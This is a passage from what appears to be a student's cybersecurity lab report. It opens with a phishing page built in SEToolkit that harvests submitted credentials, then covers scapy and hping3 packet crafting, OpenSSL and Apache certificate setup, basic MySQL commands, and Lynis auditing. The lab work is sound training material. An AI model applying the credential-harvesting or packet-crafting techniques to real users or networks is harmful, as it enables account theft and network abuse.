Step 1 – Navigate to <IP_Address> used in SEToolkit. A google login page appear, that’s the
template generated by SEToolkit moreover whatever credential submitted via the page will
be logged by SEToolkit

Fig 6.1.2 Illustrates the fake login page and the credential harvested by SEToolkit

The page The log

2170041 50
Week 8 – Session Hijacking

8.1 Packet Crafting using scapy.

Scapy is a sophisticated Python library for packet creation, manipulation, and transmission
that may be used for network research. For purposes of testing, debugging, research, and
network analysis, it may be used to build bespoke packets.

Using Scapy, users may build packets from scratch, down to the individual layer and field
specifications. Users may also record and analyse network traffic, change and insert packets
into running networks, and modify existing packets. In addition to providing low-level access
to the underlying packet structures and protocols, Scapy also offers a high-level API for
producing and modifying packets.

Scapy is widely used by those who study network and computer security for testing and
analysis purposes. For instance, they may utilise Scapy to do network traffic analysis or attack
simulations. Network vulnerabilities, such those susceptible to buffer overflow or SQL
injection attacks, may also be discovered and analysed using Scapy.

Fig 8.1 Illustrates the creation if IP packet.

In fig 8.1 ip is the variable which has IP() function with TTL set to 10
Ip.src is set to 127.0.0.1 which is the source ip
Ip.dst is set to 8.8.8.8(google public dns)

2170041 51
 Fig 8.2 Illustrates the packet in Wireshark.

Fig 8.2 confirms that the packet was sent to 8.8.8.8 the destination address with source
address as 127.0.0.1

In conclusion, Scapy is an effective and versatile programme for doing in-depth studies of
computer networks and their security. It is a helpful tool for learning about and enhancing
network security thanks to its Python interface and packet building capabilities.

8.2. Packet crafting using hping3.

Hping3 is a command-line programme for sending customised packets across networks. It has
a wide range of applications in network analysis and testing, including port scanning, firewall
and IDS testing, and traffic generation for performance testing.

Hping3 functions by enabling users to build packets using a wide range of protocols and
packet types, including ICMP, TCP, UDP, and RAW IP. Users have granular control over packet
behaviour thanks to the ability to set values for each layer and field in the packet header.

While testing and analysing network security, hping3 is often used by security researchers.
For instance, hping3 may be used to discover open ports and susceptible services on a target
system, to evaluate the efficacy of firewalls and IDSs, and to create network traffic for
performance testing.

2170041 52
 Fig 8.3 Illustrates the creation of icmp packet using hping3.

In fig 8.3 hping3 is used to create an ICMP packet with destination ip as 192.168.68.12

Fig 8.4 Illustrates custom ICMP packet using hping3.

In the above fig 8.4 hping3 is used to create a custom ICMP packet

Hping3 – the utility used to create a custom packet.

1 – packet type (ICMP)
V – verbosity
C – ICMP type (13: timestamp)
c- count (no. of packets to send)

2170041 53
let’s validate the packet in tcpdump

Fig 8.5 Illustrates custom packet under tcpdump

In general, hping3 is a useful tool for doing sophisticated network analysis and conducting
security research because of its power and adaptability. Those who are interested in
understanding and improving network security will find it to be an invaluable resource due to
its command-line interface as well as its skills in packet creation.

2170041 54
Week 9 - Hacking web servers and web applications
The OpenSSL command line utility may be used in Linux for the purpose of generating an SSL
certificate. For instance, you may produce a certificate that is self-signed by executing the
command that is listed below:

9.1. Creating and Installing SSL certificates

The openssl genrsa -out ca.key 2048 command generates a new RSA private
key using OpenSSL, with a key length of 2048 bits, and saves it to a file named ca.key.

Fig 9.1 Illustrates the creation of SSL certificate.

• Openssl: This is the command to invoke the OpenSSL software.

• genrsa: This is a subcommand of OpenSSL that generates an RSA key pair.
• -out ca.key: This option specifies the output file for the generated private key. In
this case, the output file will be named ca.key.
• 2048: This option specifies the key length in bits. A key length of 2048 bits is secure
for most purposes.

The openssl req -new -key ca.key -out ca.csr command generates a new
certificate signing request (CSR) using OpenSSL, which can be used to obtain a digital
certificate from a Certificate Authority (CA).

Fig 9.2 Illustrates the creation of certificate file.

2170041 55
Use the below command to sign the certificate.

Fig 9.3 Illustrates the signing process.

Now copy the newly generated key file and certificate in the following directories.

Fig 9.4 Illustrates public and private key.

9.2. Configuring SSL certificates

Go to /etc/apache2/sites-available/ directory and make the necessary changes as shown in

the screenshot below.

Fig 9.5 Illustrates the configuration of SSL certificate.

Now to test the certificate start the Apache service and navigate to https://localhost

2170041 56
Week 10 – Understanding SQL commands.
MySQL is a prominent relational database management system (RDBMS) that stores,
organises, and retrieves large quantities of data. It is frequently used for web applications and
content management systems requiring the storage and retrieval of dynamic data.

MySQL is utilised in numerous sectors, including e-commerce, finance, healthcare, and

education. MySQL is commonly used to power web applications that require scalable and
robust data storage. For instance, MySQL is utilised by online retailers to store customer data,
product catalogues, and order information. It is used by educational institutions to manage
student information, course catalogues, and faculty data. MySQL is also frequently used for
financial applications, such as online banking systems, where security and dependability are
of the utmost importance.

This section is all about exploring MySQL database, In order to understand MySQL better, its
service should be up and running, the command to do that is :

`service mysql start`

Fig 10.1 Illustrates the available databases in MySQL.

Now, that the service is running. Log in to the database using root privilege.

`mysql -u root` as shown in the fig 10.1. Next step is to create a list the available
database with the following command.

`show database` as shown in the fig 10.1

2170041 57
Now, let’s create a new database using the following command:

`create database database_name`. This command creates a new database with the
given name. refer fig 10.2

Fig 10.2 Illustrates the creation of new Database in MySQL.

2170041 58
Week 11 – Auditing Linux system
With Lynis, doing a system audit on a Linux machine is as easy as 1-2-3.

Follow the instructions on the Lynis website to get it set up on your Linux machine.

To do a full audit of the system after installing Lynis, use "sudo lynis audit system" to launch
the programme in audit mode. If Lynis detects any vulnerabilities or setup errors on your
system, it will provide a report identifying the problem areas.

If there are any security holes or configuration problems highlighted in Lynis's report, these
should be investigated and fixed. Do this on a regular basis to keep your system protected
and up-to-date.

Overall, auditing your Linux system using Lynis may help you spot and fix security flaws, boost
performance and stability, and confirm that your setup is up to par with industry
requirements.

Fig 11.1 Illustrates the version of installed Lynis.

Lynis has many scan modes to meet the demands of its users. Some of Lynis's scan modes are
as follows:

The system is audited and a report on its present state is generated in the default scan mode.

A forensic scan may be used to undertake forensic analysis and help in the investigation of
security events or system breaches by using its numerous modules, such as Process
Accounting, Log File Analysis, File Integrity, and Memory Analysis. It is highly suggested that
while performing forensic investigations, you collaborate with a skilled forensic examiner or
security professional because of the particular knowledge and skills required for forensic
analysis.

During a compliance scan the system is compared to known security standards and guidelines
such those provided by the Center for Internet Security (CIS), the Health Insurance Portability
and Accountability Act (HIPAA), and the Payment Card Industry Data Security Standard (PCI-
DSS) (Payment Card Industry Data Security Standard).

2170041 59
Check for Vulnerabilities: This setting checks for any potential security holes that an attacker
may exploit.

Overall, Lynis's several scan modes provide customers a great deal of leeway in tailoring
system audits to their own objectives and preferences. It is advisable to perform many scan
modes to acquire a thorough picture of the system's security and configuration status since
each scan mode has its own set of tests and plugins.

Fig 11.2 Illust5rates the different scan type and modules option

Once the scan completes it provides the report in a human-friendly format, refer fig 11.3

Fig 11.3 Illustrates the scan report of the system using Lynis.

2170041 60
Once the scan completes, Lynis also provides an exhaustive list of suggestion to secure the
system.

Fig 11.4 Illustrates the suggestion provided by Lynis.

2170041 61